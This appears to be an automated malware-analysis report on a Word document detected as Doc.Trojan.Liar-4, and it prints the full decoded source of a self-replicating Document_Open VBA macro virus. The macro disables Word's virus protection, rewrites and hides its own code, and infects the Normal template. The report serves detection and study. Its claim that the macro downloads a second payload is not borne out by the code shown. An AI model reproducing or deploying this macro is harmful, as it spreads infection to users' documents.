MALICIOUS
Risk Score: 120
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains a VBA macro that is triggered by the Document_Open event. This macro appears to obfuscate its code and inject it into the document's normal template or active document. The macro's authoring metadata and the ClamAV detection name 'Doc.Trojan.Liar-4' suggest malicious intent, likely to download and execute a secondary payload. The macro's code is heavily obfuscated, making it difficult to determine the exact payload or destination.
Heuristics (3)
- ClamAV: Doc.Trojan.Liar-4 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Liar-4
- VBA macros detected (medium, 1 related finding, OLE_VBA_MACROS): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1739 bytes |

SHA-256: fcfc5ac7e449d68101898353a0d05b7f9f042bbc294e602d7f5131f6f4d6ee39

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Rem Name: Class97Macro.klausi Rem Author: inspector klausi Rem Date: August 1999 ---------------------------> Private Sub DOCUMenT_OPEN() ' Dim v(175): Options.VirusProtection = (Rnd * 0): Options.SaveNormalPrompt = (Rnd * 0) ' Set A = MacroContainer.VBProject: Set Ab = A.VBcOmponEnts(1) ' Set ABc = Ab.coDEMoDUle: Set S = NormalTemplate: T = Chr(39) ' If MacroContainer = S Then Set S = ActiveDocument ' Set NH = S.VBProject.VBcOmponEnts(1).coDEMoDUle: Li = ABc.cOUntofliNEs: Y = 100 + Int(Rnd * 50) ' For i = 1 To Li: jc = "": d = Int(Rnd * 3): P = InStr(ABc.LInES(i, 1), T) ' If P = 1 And Li > Y Then ' d = 1: GoTo N_ ' End If ' l = UCase(Left(ABc.LInES(i, 1), (P - 1))) ' For O = 1 To Len(l): F = Mid(l, O, 1) ' If Asc(F) < 90 And Asc(F) > 65 Then F = Chr(Asc(F) + Int(Rnd * 2) * 32) ' v(i) = v(i) & F: Next O ' For J = 1 To Int(75 - (Rnd * 20)): jc = jc & Chr(255 - Int(Rnd * 100)): Next J ' v(i) = v(i) & T & jc ' If d = 2 Then v(i) = v(i) & vbCr & T & jc ' vc = vc & v(i) & vbCr ' N_: ' Next i ' If NH.cOUntofliNEs < (1 + 1 + 2) Then ' NH.dELeTelINES 1, NH.cOUntofliNEs: NH.AdDFrOMSTRiNg vc: NH.dELeTelINES NH.cOUntofliNEs, 1 ' With Dialogs(wdDialogFileSummaryInfo): .Author = "INsPECtor klAUsI": .Title = "INfEcted wItH clAss97MAcRo.kLAuSi": .Execute: End With ' If ActiveDocument.Saved = (Rnd * 0) Then ActiveDocument.SaveAs ActiveDocument.FullName ' End If ' End Sub ' Rem cODed by iNspector kLAUSi ' |